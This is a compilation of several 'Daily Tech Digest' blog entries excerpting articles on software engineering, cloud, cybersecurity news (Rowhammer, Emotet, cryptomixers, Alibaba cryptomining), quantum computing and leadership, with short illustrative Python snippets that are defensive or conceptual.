Daily Tech Digest - November 18, 2021

Software Engineering XOR Data Science

Software metrics such as the number of requests, response times, and error types can be extracted by writing good logs. For both SW and DS projects, it is also good practice to perform data checks in the controller class, where requests are received and forwarded to the relevant services, before any operation starts, regardless of whether the UI side does its own checks. Regex validations and data type checks can save an application on both the performance and the security front. A simple validation may prevent an easy SQL injection, and that can even save the company’s future. On the DS side, there should be further monitoring beyond the software metrics. The distributions of the model features and of the model predictions are vital: if the distribution of any data column changes, there may be a data shift, and a new model training run may be required. If the prediction results can be validated in a short time, they should be monitored, and developers warned whenever accuracy crosses a given threshold in either direction.
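
As a sketch of both ideas, here is what a controller-level regex check and a simple distribution monitor might look like in Python (the ID format, the threshold, and the choice of a KS test are illustrative assumptions, not code from the article):

```python
import re
from scipy.stats import ks_2samp  # two-sample Kolmogorov-Smirnov test

# Controller-level check: only alphanumeric customer IDs ever reach a query,
# which shuts the door on the easy SQL injections mentioned above.
CUSTOMER_ID_RE = re.compile(r"^[A-Za-z0-9]{1,32}$")

def validate_customer_id(raw: str) -> str:
    if not CUSTOMER_ID_RE.match(raw):
        raise ValueError(f"rejected malformed customer id: {raw!r}")
    return raw

# DS-side monitor: compare a feature's live distribution against the
# training-time reference; a small p-value suggests a data shift.
def feature_drifted(reference, live, alpha=0.01) -> bool:
    _, p_value = ks_2samp(reference, live)
    return p_value < alpha  # True -> consider retraining the model
```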


What Developers Should Look for in a Low-Code Platform

To minimize technical debt, it makes sense to reduce the number of platforms on which you build your apps. It follows that the fewer systems you have, the more value you get from each. When choosing a low-code platform, evaluate the other workflows you have already deployed on that platform, or plan to deploy in the future. Let’s say you’re considering an employee suggestion box app. If you already have, or will have, a platform where you run employee workflows, then you not only accelerate the time it takes to create the suggestion box app, but also avoid the additional technical debt of costly integrations. Bringing in a new platform means you have to replicate the employee information, which creates additional cost to implement and maintain. You can remove the need for that integration by having a single system of record where your employee suggestion box and existing employee workflows both live. Governance matters as well. Process governance is how you manage things like the request or intake process, change management, and release management. When it’s time to release an app on your low-code platform, it should theoretically be as easy as clicking a button; this is where technical governance comes in.


The race to secure Kubernetes at run time

Although developers now tend to test earlier and more often—or shift left, as it is commonly known—containers require holistic protection throughout the entire life cycle and across disparate, often ephemeral environments. “That makes things really challenging to secure,” Gartner analyst Arun Chandrasekaran told InfoWorld. “You cannot have manual processes here; you have to automate that environment to monitor and secure something that may only live for a few seconds. Reacting to things like that by sending an email is not a recipe that will work.” In its 2019 white paper “BeyondProd: A new approach to cloud-native security,” Google laid out how “just as a perimeter security model no longer works for end users, it also no longer works for microservices,” where protection must extend to “how code is changed and how user data in microservices is accessed.” Where traditional security tools focused on either securing the network or the individual workloads, modern cloud-native environments require a more holistic approach than just securing the build.
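
As an illustration of what automating that looks like, here is a small sketch using the official Kubernetes Python client to watch pod events cluster-wide and flag a policy violation in real time; the privileged-container rule is an invented example policy, not a product recommendation:

```python
from kubernetes import client, config, watch

config.load_kube_config()  # use load_incluster_config() when running in-cluster
v1 = client.CoreV1Api()

# Stream pod lifecycle events cluster-wide; even a container that lives for
# only a few seconds produces an event we can react to automatically.
for event in watch.Watch().stream(v1.list_pod_for_all_namespaces):
    pod = event["object"]
    for container in pod.spec.containers or []:
        sc = container.security_context
        if sc and sc.privileged:
            # A real pipeline would page on-call or quarantine the workload,
            # not print (and certainly not send an email).
            print(f"privileged container {container.name} in "
                  f"{pod.metadata.namespace}/{pod.metadata.name}")
```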


How organizations are beefing up their cybersecurity to combat ransomware

Educating employees about cybersecurity is another key method to help thwart ransomware attacks. Among those surveyed, 69% said their organization has boosted cyber education for employees over the last 12 months. Some 20% said they haven't yet done so but are planning to increase training in the next 12 months. Knowing how to design your employee security training is paramount. Some 89% of the respondents said they've educated employees on how to prevent phishing attacks, 95% have focused on how to keep passwords safe and 86% on how to create secure passwords. Finally, more than three-quarters (76%) of the respondents said they're concerned about attacks from other governments or nation states impacting their organization. In response, 47% said they don't feel their own government is taking sufficient action to protect businesses from cyberattacks, and 81% believe the government should play a bigger role in defining national cybersecurity protocol and infrastructure. "IT environments have become more fluid, open, and, ultimately, vulnerable," said Bryan Christ, sales engineer at Hitachi ID Systems.


DevOps transformation: Taking edge computing and continuous updates to space

One of the biggest technological pain points in space travel is power consumption. On Earth, we’re beginning to see more efficient CPUs and memory, but in space, dissipating the heat of your CPU is quite hard, making power consumption the critical constraint. From hardware to software to the way you do processing, everything needs to account for power consumption. On the flip side, in space there is one thing that you have plenty of (obviously): space. This means that the size of physical hardware is less of a concern; weight and power consumption are the larger issues, because those factors also shape the way microchips and microprocessors are designed. A great example of this can be found in the Ramon Space design. The company uses AI- and machine learning-powered processors to build space-resilient supercomputing systems with Earth-like computing capabilities, with the hardware components ultimately controlled by the software riding on top of them. The idea is to optimize the way software and hardware are utilized so applications can be developed and adapted in real time, just as they would be here on Earth.


What is LoRaWAN and why is it taking over the Internet of Things?

The wireless communication takes advantage of the long-range characteristics of the LoRa physical layer, allowing a single-hop link between the end-device and one or many gateways. All modes are capable of bi-directional communication, and there is support for multicast addressing groups to make efficient use of spectrum during tasks such as Firmware Over-The-Air (FOTA) upgrades. This has made LoRaWAN, the network protocol built on LoRa, the most widely used LPWAN technology in the unlicensed bands below 1GHz, providing battery-powered sensor nodes with kilometres of range for the expanding applications across the Internet of Things. A key area for this low-power, long-range connectivity is smart cities. The ability to place wireless smart sensors for air quality, traffic density and transportation wherever they are needed across the urban infrastructure can give key insights into the activity of the city. The robust, low-power nature of the protocol allows local authorities to run a cost-effective network with sensors in the right place, whether powered by local power lines, batteries or solar panels.
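
For a flavor of what the sensor side involves, here is a hypothetical uplink decoder; the 6-byte payload format is invented for illustration, since each deployment defines its own (or uses a standard such as Cayenne LPP):

```python
import struct

# Hypothetical 6-byte uplink from an air-quality node: uint16 PM2.5 (µg/m³ x10),
# int16 temperature (°C x100), uint16 battery (mV), big-endian. Payloads are
# kept this small so a node can run for years on a battery.
def decode_uplink(payload: bytes) -> dict:
    pm25_x10, temp_x100, battery_mv = struct.unpack(">HhH", payload)
    return {
        "pm2_5_ug_m3": pm25_x10 / 10,
        "temperature_c": temp_x100 / 100,
        "battery_mv": battery_mv,
    }

print(decode_uplink(bytes.fromhex("00d108990e74")))
# {'pm2_5_ug_m3': 20.9, 'temperature_c': 22.01, 'battery_mv': 3700}
```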


Serious security vulnerabilities in DRAM memory devices

Razavi and his colleagues have now found that this hardware-based "immune system" only detects rather simple attacks, such as double-sided attacks where two memory rows adjacent to a victim row are targeted, and can still be fooled by more sophisticated hammering. They devised a piece of software, aptly named "Blacksmith", that systematically tries out complex hammering patterns in which different numbers of rows are activated with different frequencies, phases and amplitudes at different points in the hammering cycle. It then checks whether a particular pattern led to bit errors. The result was clear and worrying: "We saw that for all of the 40 different DRAM memories we tested, Blacksmith could always find a pattern that induced Rowhammer bit errors," says Razavi. As a consequence, current DRAM memories are potentially exposed to attacks for which there is no line of defense, and will remain so for years to come. Until chip manufacturers find ways to update mitigation measures on future generations of DRAM chips, computers will continue to be vulnerable to Rowhammer attacks.
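
A purely conceptual sketch of the kind of non-uniform schedule Blacksmith searches over; this only models the frequency/phase/amplitude idea and is nothing like a working Rowhammer tool, which requires native code, cache control, and physical-address knowledge:

```python
import random

# Generate a random schedule of row activations across one "cycle" of slots,
# varying each aggressor row's frequency, phase, and amplitude, the three
# knobs the researchers describe Blacksmith fuzzing.
def random_pattern(rows, slots=64):
    schedule = [[] for _ in range(slots)]
    for row in rows:
        frequency = random.choice([1, 2, 4, 8])  # activations per cycle
        phase = random.randrange(slots)          # offset within the cycle
        amplitude = random.choice([1, 2, 3])     # back-to-back activations
        for k in range(frequency):
            slot = (phase + k * slots // frequency) % slots
            schedule[slot].extend([row] * amplitude)
    return schedule  # slot index -> ordered row activations to issue

pattern = random_pattern(rows=[17, 19, 23])
```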


Money Laundering Cryptomixer Services Market to Criminals

Here's how it functions in greater detail: "Mixers work by allowing threat actors to send a sum of cryptocurrency - usually bitcoin - to a wallet address the mixing service operator owns. This sum joins a pool of the service provider's own bitcoins, as well as other cybercriminals using the service," Intel 471 says in a new report. "The initial threat actor's cryptocurrency joins the back of the 'chain' and the threat actor receives a unique reference number known as a 'mixing code' for deposited funds," the company says. "This code ensures the actor does not get back their own 'dirty' funds that theoretically could be linked to their operations. The threat actor then receives the same sum of bitcoins from the mixer's pool, muddled using the service's proprietary algorithm, minus a service fee." As a further anonymity boost, clean bitcoins can be routed to additional cryptocurrency wallets to make the connections with dirty bitcoins even more difficult for law enforcement authorities to track, Intel 471 says.
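
The described flow reduces to simple bookkeeping, which a toy model makes clear (purely illustrative; real services add time delays, payout splitting, and proprietary shuffling):

```python
# Deposits join a shared pool, a "mixing code" identifies the claim, and the
# payout comes from other users' pooled coins minus the fee.
class ToyMixer:
    def __init__(self, fee=0.03):
        self.fee, self.pool, self.next_code = fee, 0.0, 0

    def deposit(self, amount: float) -> int:
        self.pool += amount
        self.next_code += 1
        return self.next_code  # the "mixing code" for this claim

    def withdraw(self, code: int, amount: float) -> float:
        payout = amount * (1 - self.fee)  # same sum back, minus the service fee
        self.pool -= payout               # paid from pooled coins, not the
        return payout                     # depositor's own "dirty" funds
```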


Innovation resilience during the pandemic—and beyond

Despite some decline in government spending, the overall impact on global innovation could be minimal. We have reason to be hopeful here: in 2008–09, increases in corporate R&D spending compensated for shortfalls in government R&D investment. And this appears to be true again today based on what we know so far. About 70% of the 2,500 largest global R&D spenders have released their 2020 R&D spending data. We found a healthy increase of roughly 10% in 2020, with roughly 60% of these largest R&D spenders reporting an increase. This reflects a decade-long trend of strong corporate innovation investment, which is perhaps not surprising, as the pace of progress in domains such as artificial intelligence and biotech has increased, and many new commercial growth opportunities have opened up around them. Of course, the view at the sector level is more nuanced. The pandemic-era focus on well-being and the rapid production of vaccines saw increased investments in health-related sectors, with estimates of US government investments in the development of the COVID-19 vaccines ranging from US$18 billion to $23 billion.


How active listening can make you a better leader

When you let the world intrude on a conversation, you unconsciously tell the other person that they are less important than the things around them. Instead, with every interaction strive to make a connection and show people the respect they deserve. To do this, start by limiting distractions. That means closing your laptop, muting your phone, and parking work problems at the door so you can focus and engage with this person in this moment. Of the hundreds of things littering your calendar, is any one of them more important than leading your team? ... It’s not enough simply to silence the world. Show the person that you are listening intently through your responses and body language: make eye contact and provide brief verbal affirmations or nod, modulating the tone of your voice as well as mirroring their body mannerisms. Paraphrasing what the other person is saying can also be a helpful tool to show you understand or are seeking clarity. When you take time to validate what someone is saying, they will feel comfortable sharing more.



Quote for the day:

"The art of communication is the language of leadership." -- James Humes

Daily Tech Digest - November 16, 2021

8 tips for a standout security analyst resume

Employers increasingly expect to see hands-on experience, says Keatron Evans, principal security researcher at security education provider InfoSec. “Have you done packet capture analysis? Can you understand and parse logs or done incident response in the cloud? It’s important to have that kind of demonstrable hands-on experience verbalized in a resume,” he says. The expectation is high because even if you haven’t held a security analyst job, hands-on experience can be acquired in other ways today, such as training exercises offered by companies like InfoSec, Immersive Labs, and Pluralsight. “Before, training was mostly certificate-driven—it wasn’t geared toward proving you can do these things,” Evans says. “Now there’s simulation in the training environment, which is turning into a good gateway to get your foot in the door.” If candidates can send a five-minute screen capture of themselves performing a task, “it’s worth more than a thousand words,” Evans says. Capture-the-flag (CTF) events are another highlight to include. If you’ve placed well in a well-known CTF or completed a penetration test, put that at the top of the resume as well, he says.


Reducing Cloud Infrastructure Complexity

Organizations the world over are indeed struggling with unnecessarily complicated multi-cloud environments. Validating the global struggle, Enterprise Strategy Group recently conducted a global survey of 1,257 IT decision makers at enterprise and midmarket organizations using both public cloud infrastructure and modern on-premises private cloud environments. The results hit home, and really do cement the notion that this cloud fragmentation is getting worse as time goes on, and that there are many companies out there seeking a ‘savior’ toolset to get a zoomed-out view of policies, compliance, security and cost optimization. An unsurprising outcome of the survey is that there is clear value in cloud management, yet even knowing that value, organizations are struggling with implementation. A mere 5% used consolidated cloud management tools extensively on premises or across public and/or private clouds. This despite a burgeoning marketplace of all-in-one solutions like VMware vRealize Suite, Flexera CMP, CloudBolt, and others.


Distributed SQL Takes Databases to the Next Level

Distributed SQL is a relational database win-win. The technology’s innovations are based on lessons learned over the past thirty or so years to deliver true dynamic elasticity. The modern benefits of dynamic elasticity include the ability to add or remove nodes simply, quickly, and on-demand. The approach is self-managing, able to automatically rebalance nodes or rebalance data within those nodes while maintaining extremely high continuous availability (i.e., automatic failover). And of course, the approach includes all of the features that make relational databases so powerful, like the ability to use standard SQL (including JOINs) and to maintain ACID compliance. A distributed SQL option like MariaDB’s Xpand is architected for all nodes to work together to form a single logical and distributed database that all applications can point to, regardless of the intended use case. Whether a business needs a three-node cluster for modest workloads or hundreds, even thousands, of nodes for unlimited scalability, distributed SQL means deployments can grow or shrink on demand.


Singularity Is Fast Approaching, and It Will Happen First in the Metaverse

To elaborate on this point: if we think about it, we have had mainframe computers that evolved into personal computers, which then evolved into mobile devices. In the case of the metaverse, however, the leap does not necessarily go to a faster device. Instead, it goes to virtual simulations of worlds and environments where, through VR and AR, we can finally buy things in the real world, and in particular things that just happen to exist only in these virtual environments. Connecting computers to the internet catapulted them to mainstream use and marked the beginning of the dot-com era, and the last 15 years were clearly shaped by the mobile phone, which led to full mass adoption. This makes the metaverse a very practical concept. It's not just VR concerts, 3D gatherings or digital assets; the metaverse is an idea that brings these concepts together and tries to explain how they are all connected. Matthew Ball, an outspoken proponent of the metaverse, has outlined a few key ideas that show what this evolved form of the internet will look like.


Data Science Is Becoming More Tool-Oriented. Will It Kill The Science Behind?

My other concern is that the number of tools you can use might be considered more important than your data science knowledge. This situation leads to data scientists being evaluated based on tool knowledge, not science. If this happens, it will be a serious problem. Software tools are just there for turning ideas into action or value. The ideas come from data scientists who blend analytical thinking, creativity, statistics, and theory. If data scientists are forced to learn as many tools as possible, they might miss the point. They will get very quick at performing tasks thanks to the highly advanced tools. However, this is not enough for creating value out of data. What leads to creating value is first to define a problem that can be solved with data. Once a problem is defined and a solution is designed, the tools are then needed to do the tasks. I think you would agree that without a problem and solution, there is no use for advanced software tools. To sum up, we definitely need software tools and packages to perform data science. They enable us to work with large amounts of data quickly and efficiently.


Cybercriminals Target Alibaba Cloud for Cryptomining, Malware

Targeting of Alibaba is on the rise thanks to a few unique features of the service, researchers noted, and the way that cloud instances can be configured. “The default Alibaba ECS instance provides root access,” according to the analysis. “With Alibaba, all users have the option to give a password straight to the root user inside the virtual machine (VM).” This is in contrast to how other cloud service providers architect their storage access, researchers pointed out. In most cases, the principle of least privilege is front and center, with different options such as not allowing Secure Shell (SSH) authentication over user and password, or allowing asymmetric cryptography authentication. That way, if cyberattackers gain credentials, entering with only low-privilege access would require them to make an “enhanced effort” to escalate the privileges, according to Trend Micro: “Other cloud service providers do not allow the user to log in via SSH directly by default, so a less privileged user is required.” 
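
A quick way to illustrate the checks implied here: audit an OpenSSH server for the risky combination of root login plus password authentication. The directives are standard sshd_config options, but treat this as a sketch rather than a hardening tool:

```python
RISKY = {"permitrootlogin": {"yes"}, "passwordauthentication": {"yes"}}

def audit_sshd(path="/etc/ssh/sshd_config"):
    findings = []
    with open(path) as fh:
        for raw in fh:
            line = raw.split("#")[0].strip()  # drop comments and whitespace
            parts = line.split(None, 1)
            if len(parts) == 2:
                key, value = parts[0].lower(), parts[1].strip().lower()
                if value in RISKY.get(key, ()):
                    findings.append(line)
    return findings  # non-empty -> root/password SSH login is enabled

print(audit_sshd())
```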


The difference between insights, actionable information and intelligent data

Insight might ultimately stem from data, but that doesn’t mean data – or even ‘intelligent’ data – should be conflated with insight. They aren’t the same thing. That’s not to say that adding intelligence to data isn’t important, of course. After all, raw and unprocessed data can only gain value once we’ve added intelligence – once we have, in other words, annotated and quantified that data. This principle is, of course, magnified in the context of what’s known as ‘big data’, which I generally take to mean datasets that must be measured in terms of gigabytes and exabytes. Through the use of machine learning, it’s possible to add intelligence to this kind of massive dataset through annotating it with sentiment, emotions, topics, and other useful variables. ... As we ascend our knowledge pyramid, it’s easy to see how one might confuse actionable information with true insight. Nonetheless, there is an important distinction between the two terms, especially when it comes to their respective relationships to long-term strategy.


What is Customer Identity and Access Management (CIAM)?

A CIAM system typically resides in the cloud and operates under a software-as-a-service (SaaS) model. It relies on built-in connectors and APIs to tie together various enterprise applications, systems, and data repositories. This makes it possible to combine features, including customer registration, account management, directory services, and authentication. When a customer visits a website or calls in, for example, the CIAM solution handles the authentication process (using a password, single sign-on, biometrics, or multiple factors). It’s also adept at juggling different protocols, including SAML, OpenID Connect, OAuth and FIDO. Once a customer signs in, it’s possible to place an order, track delivery, update a user profile, and handle other account-related tasks. Another benefit of CIAM is that it delivers risk-based authentication (RBA), which is sometimes referred to as adaptive authentication. This means that a system can look for signs and signals -- such as a user’s IP address, User-Agent HTTP headers, the date and time of access, and other factors -- to assess how risky a given sign-in attempt is.
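
A minimal sketch of the risk-based authentication idea, with invented signal weights and thresholds:

```python
# Score a sign-in from contextual signals; step up authentication as the
# score rises. Weights and thresholds are purely illustrative.
def risk_score(signin: dict, profile: dict) -> int:
    score = 0
    if signin["ip"] not in profile["known_ips"]:
        score += 40
    if signin["user_agent"] not in profile["known_agents"]:
        score += 20
    if signin["hour"] not in range(6, 23):  # unusual time of day
        score += 15
    return score

def required_step(score: int) -> str:
    if score >= 60:
        return "deny"                            # too risky to allow at all
    return "mfa" if score >= 30 else "password"  # adaptive step-up
```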


Researchers Spot Comeback of the Emotet Botnet

The development is concerning but not surprising for those fighting large-scale botnets. Emotet and Trickbot were essentially run by different departments of one cybercriminal organization that's based in Russia, says Alex Holden, CISO of Hold Security, a Wisconsin-based security consultancy that studies the cybercriminal underground. Researchers have long noticed close associations, with Emotet distributing Trickbot and vice versa. Both have been linked to distribution of ransomware including Ryuk and Conti. "We knew that it [Emotet] would come back," Holden says. "It was a matter of time. But it may signal more battles are ahead." Emotet was the "biggest and baddest" botnet before it was taken down, says James Shank, senior security evangelist and chief architect, Community Services, with Team Cymru. A new version of Emotet is being distributed by Trickbot, says Marcus Hutchins, a malware researcher with Kryptos Logic who is also part of Cryptolaemus, a notable group of top security researchers and systems administrators dedicated to fighting Emotet. Emotet's return will likely mean greater distribution of ransomware eventually.


Council Post: Building Human-In-The-Loop Systems

Human-in-the-loop systems are essentially about providing this context to AI models. This context can take various forms. It includes removing bias from models so they adhere to ethical standards, providing situational-awareness information to improve predictions, or dispensing a final oversight before a decision is made. Context also flows the other way: the AI system provides context to the human being for further action. When this critical piece of information is missing, it leads to what is popularly known as “the black box problem”, where users don’t really understand how the model has churned through data and arrived at a decision. Given that algorithms now drive parts of our lives, with their use in driving cars, giving product recommendations, making investment decisions and even predicting employee attrition, it is becoming integral for stakeholders to understand and trust these AI operations. The key to designing a successful human-in-the-loop system is solving this challenge of two-way communication of context.
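
A minimal sketch of the routing logic at the heart of such a system, assuming an sklearn-style classifier; the names and the confidence threshold are illustrative:

```python
REVIEW_QUEUE, FEEDBACK = [], []

def decide(model, features, threshold=0.9):
    confidence = max(model.predict_proba([features])[0])  # top-class probability
    if confidence >= threshold:
        return model.predict([features])[0]  # model decides on its own
    REVIEW_QUEUE.append(features)            # uncertain -> human oversight
    return None

def record_human_decision(features, label):
    # The human's answer becomes context for the model: a labeled example
    # that flows into the next training run.
    FEEDBACK.append((features, label))
```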



Quote for the day:

"A lot of people have gone farther than they thought they could because someone else thought they could." -- Zig Zigler

Daily Tech Digest - November 15, 2021

Creating Time Crystals Using New Quantum Computing Architectures

“A time crystal is perhaps the simplest example of a non-equilibrium phase of matter,” said Yao, UC Berkeley associate professor of physics. “The QuTech system is perfectly poised to explore other out-of-equilibrium phenomena including, for example, Floquet topological phases.” These results follow on the heels of another time crystal sighting, also involving Yao’s group, published in Science several months ago. There, researchers observed a so-called prethermal time crystal, where the subharmonic oscillations are stabilized via high-frequency driving. The experiments were performed in Monroe’s lab at the University of Maryland using a one-dimensional chain of trapped atomic ions, the same system that observed the first signatures of time crystalline dynamics over five years ago. Interestingly, unlike the many-body localized time crystal, which represents an innately quantum Floquet phase, prethermal time crystals can exist as either quantum or classical phases of matter. Many open questions remain. Are there practical applications for time crystals? Can dissipation help to extend a time crystal’s lifetimes? And, more generally, how and when do driven quantum systems equilibrate?


Why Tree-Based Models are Preferred in Credit Risk Modeling?

Credit risk models are used by financial organizations to assess the credit risk of potential borrowers. Based on the credit risk model’s assessment, they decide whether or not to approve a loan, as well as the loan’s interest rate. New means of estimating credit risk have emerged as technology has progressed, such as credit risk modelling in R and Python. Using the most up-to-date analytics and big data techniques to model credit risk is one of them. Other factors, such as the growth of economies and the creation of various categories of credit risk, have also had an impact on credit risk modelling. Machine learning enables more advanced modelling approaches, like decision trees and neural networks, to be used. This introduces nonlinearities into the model, allowing for the discovery of more complex connections between variables. We elected to employ an XGBoost model fed with features picked using the permutation importance technique. ML models, on the other hand, are frequently so complex that they are difficult to understand. We chose to combine XGBoost and logistic regression because interpretability is critical in a highly regulated industry like credit risk assessment.
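
A sketch of that pipeline using xgboost and scikit-learn's permutation importance; the synthetic data and hyperparameters are stand-ins for the real loan data, which the article does not share:

```python
from sklearn.datasets import make_classification
from sklearn.inspection import permutation_importance
from sklearn.model_selection import train_test_split
from xgboost import XGBClassifier

# Synthetic stand-in for real loan data (features + default labels).
X, y = make_classification(n_samples=5000, n_features=12, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)

model = XGBClassifier(n_estimators=300, max_depth=4).fit(X_train, y_train)

# Permutation importance: shuffle one feature at a time and measure how much
# the test score drops; the features that hurt most when shuffled are kept.
result = permutation_importance(model, X_test, y_test, n_repeats=10)
keep = sorted(range(X.shape[1]), key=lambda i: -result.importances_mean[i])[:5]
print("most informative features:", keep)
```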


Intelligent Automation: What’s the Missing Piece of AIOps?

Up until now, AIOps has mostly been used in the context of monitoring. As a buzzword, people tend to think of the term in relation to creating baselines for your data and then alerting to any deviations, connecting multiple sources of information to find the root cause for a problem. These are powerful use cases and are allowing businesses to find correlations that they might not have achieved without AI. For example, you might find that poor bandwidth in a specific region led to an increase in tickets from customers within that location, or that you have idle cloud resources that are costing you in storage or compute dollars behind the scenes, allowing you to make manual changes to optimize costs. However, in many ways, categorizing AIOps as just monitoring and detection doesn’t make it that different from the previous category of IT operations analytics, where companies would look at operational data, including logs and security feeds, and then aggregate these to make smarter decisions. To get more out of AIOps, companies need to move past simple monitoring use cases, and look toward management of the cloud with the help of automation.
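
The baseline-and-deviation idea in miniature, using pandas; the window size and the 3-sigma rule are illustrative choices:

```python
import pandas as pd

# Learn a rolling baseline for a metric (say, tickets per hour per region)
# and flag points that deviate by more than `sigmas` standard deviations.
def anomalies(series: pd.Series, window: int = 24, sigmas: float = 3.0):
    baseline = series.rolling(window).mean()
    spread = series.rolling(window).std()
    return series[(series - baseline).abs() > sigmas * spread]
```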


The State of Quantum Computing Systems

Quantum computing “systems” are still in development, and as such the entire system paradigm is in flux. While the race to quantum supremacy amongst nations and companies is picking up pace, it is still at too early a stage to call it a “competition.” There are only a few potential qubit technologies deemed practical, the programming environment is nascent with abstractions that have still not been fully developed, and there are relatively few (albeit extremely exciting) quantum algorithms known to scientists and practitioners. Part of the challenge is that it is very difficult, and nearly impractical, to simulate quantum applications and technology on classical computers -- doing so efficiently would imply that classical computers had themselves kept pace with their quantum counterparts! Nevertheless, governments are pouring funding into this field to help push humanity to the next big era in computing. The past decade has shown an impressive gain in qubit technologies, quantum circuits and compilation techniques are being realized, and the progress is leading to even more (good) competition towards the realization of full-fledged quantum computers.


Build Your First Machine Learning Model With Zero Configuration — Exploring Google Colab

You may be wondering what’s the point of training an ML model. Well, for different use cases, there are different purposes. But in general, the purpose of training an ML model is more or less about making predictions on things it has never seen. The model encodes how to make good predictions, and the way to create a model is called training — using existing data to identify a proper way to make predictions. There are many different ways to build a model, such as K-nearest neighbors, SVC, random forest, and gradient boosting, just to name a few. For the purpose of the present tutorial showing you how to build an ML model using Google Colab, let’s just use a model that’s readily available in sklearn — the random forest classifier. One thing to note: because we have only one dataset, we’ll split it into two parts to test the model’s performance, one for training and the other for testing. We can simply use the train_test_split method, as shown below. The training dataset has 142 records, while the test dataset has 36 records, approximately a 4:1 ratio.
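
The article does not name the dataset, but scikit-learn's built-in wine dataset happens to reproduce the same 142/36 split at test_size=0.2; a condensed version of the described steps:

```python
from sklearn.datasets import load_wine
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

X, y = load_wine(return_X_y=True)           # 178 records in total
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.2, random_state=42)   # -> 142 train / 36 test

model = RandomForestClassifier().fit(X_train, y_train)
print(model.score(X_test, y_test))          # accuracy on the unseen 36 records
```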


Have you traded on-premise lock-in for in-cloud lock-in?

In a global marketplace, being tied to one cloud service can be either impossible to achieve or intolerable to the business, so cloud vendor neutrality becomes important. Practicality is one driver for always being open to multiple cloud solutions. There’s also vendor strategy: you will get pushed, hard, to opt for the vendor’s version of key parts of the software stack. Take databases: Amazon doesn’t want you to move your Oracle apps onto Amazon; it wants you on the Amazon database products instead. In and of itself, that’s not a crazy or risky decision; there are advantages to doing that if you are an Amazon customer already, and there will probably be economies of scale. It might even be cheaper (although that isn’t always the case with cloud contracts). This may feel like an easier solution to adopt, but it could be a real headache if you have committed to microservices and have all kinds of open source apps running all over the place (as you want to, as it’s horses for courses here), and the database at the back is an Amazon database.


A CIO's Introduction to the Metaverse

Collaboration is one of three primary use cases for a metaverse in the enterprise right now, according to Forrester VP J.P. Gownder. Another primary use case is one championed by chip giant Nvidia -- simulations and digital twins. Huang announced Nvidia Omniverse Enterprise during his keynote address at the company’s GTC 2021 online AI conference this month and offered several use cases that focused on simulations and digital twins in industrial settings such as warehouses, plants, and factories. If you are an organization in an industry with expensive assets -- for instance oil and gas, manufacturing, or logistics -- it makes sense to have this use case on your radar, according to Gartner’s Nguyen. “That’s where augmented reality is benefiting enterprise right now,” he says. As an example, during his keynote address, Nvidia’s Huang showed a video of a virtual warehouse created with Nvidia Omniverse Enterprise enabling an organization to visualize the impact of optimized routing in an automated order picking scenario. That’s an example of a particular use case, but Omniverse itself is Nvidia’s platform to enable organizations to create their own simulations or virtual worlds.


Misconfigured FBI Email System Abused to Run Hoax Campaign

The FBI says the misconfiguration involved the Law Enforcement Enterprise Portal, or LEEP, which allows state, local and federal agencies to share information, including sensitive documents. The portal also supports a Virtual Command Center, which allows law enforcement agencies to share real-time information about events such as shootings and child abductions. Although the abused email server is operated by the FBI, the bureau issued an updated statement Sunday noting that the server is not part of the bureau's corporate email service, and that no classified systems or personally identifiable information was compromised. "No actor was able to access or compromise any data or PII on the FBI's network," the FBI says. "Once we learned of the incident, we quickly remediated the software vulnerability, warned partners to disregard the fake emails, and confirmed the integrity of our networks." The hacker-crafted note, a copy of which has been released by Spamhaus, warned that data had potentially been exfiltrated.


Change management: 9 ways to build resilient teams

Resilience may be misunderstood as the ability to bounce back instantly from difficulties or to roll with any manner of punches. Defining it that way, or encouraging mindless acceptance of workplace stressors, is a recipe for burnout. “The problem is when leadership focuses on building a team’s resilience as a way to avoid addressing unnecessary causes of stress that are part of the organization’s culture,” says David R. Caruso, Ph.D., author of A Leader’s Guide to Solving Challenges with Emotional Intelligence. “We will not, nor should we, try to meditate our way out of a toxic culture. Buying everyone a yoga mat while failing to address sources of unnecessary stress is a problem.” Therefore, it’s important that IT leaders understand the state of affairs within the IT organization and actively address issues and drivers of burnout. “Burnout and change fatigue – disengagement that comes from constant or poorly managed change – are very real risks for team members and organizations,” says Noelle Akins, leadership coach and founder of Akins & Associates. “Resilience is not just non-stop adaptability.”


How Happiness Technology Is Affecting Our Everyday Lives

Improving employee happiness helps businesses, too. Utilizing this AI technology allows companies to track what's called "psychological capital," a phrase coined by professor Fred Luthans. Helping employees improve their scores not only makes people happier, but also significantly increases productivity and profit for companies. But what about using AI to make us happier outside of work? Happiness technologies have their place in our personal lives as well. ... One problem that the business world has been working on for years is finding a reliable, discreet way to analyze the day-to-day activities of employees to increase productivity and engagement. Research clearly shows that happiness is correlated to better performance, so this trend of tracking and improving employee happiness has gained popularity. On the back of this trend, AI is being used for robotic process automation (RPA) and content intelligence.



Quote for the day:

"Leadership is a matter of having people look at you and gain confidence, seeing how you react. If you're in control, they're in control." -- Tom Landry

Daily Tech Digest - November 14, 2021

Microsoft’s Kubernetes for the rest of us

Getting started with Azure Container Apps is relatively simple, using the Azure Portal and working with ARM templates or programmatically via the Azure CLI. In the Azure Portal, start by setting up your app environment and associated monitoring and storage in an Azure resource group. The app environment is the isolation boundary for your services, automatically setting up a local network for deployed containers. Next create a Log Analytics workspace for your environment. Containers are assigned CPU cores and memory, starting with 0.25 cores and 0.5GB of memory per container, up to 2 cores and 4GB of memory. Fractional cores are a result of using shared tenants, where core-based compute is shared between users. This allows Microsoft to run very high-density Azure Container Apps environments, allowing efficient use of Azure resources for small event-driven containers. Containers are loaded from the Azure Container Registry or any other public registry, including Docker Hub.


Should SMBs Hire Tech Talent Or Outsource?

Taking the work outside the company network exposes a lot of vulnerabilities in the systems. The in-house network and technologies are the best place to work on any solution development, as they have better security and every team member works to keep them safe. There are no trust issues with your own teams, and it is much simpler to control, track, and communicate with the members. Here comes the difficult part: having an in-house team is quite expensive. Let’s say the base salary of a developer in India is Rs 6 lakhs per annum. Multiply this by four members, and it comes to Rs 24 lakhs. Of course, this is the least that one has to spend; as designations rise, so do the salaries. Tech managers are not just expensive but also hard to find. And there are the added costs of systems, supporting software and tools, and training expenses. Since developers need to constantly upskill themselves to stay relevant, they will need support to attend conferences and even buy online training courses.


Ready for cloud? Five factors to consider before choosing your partner

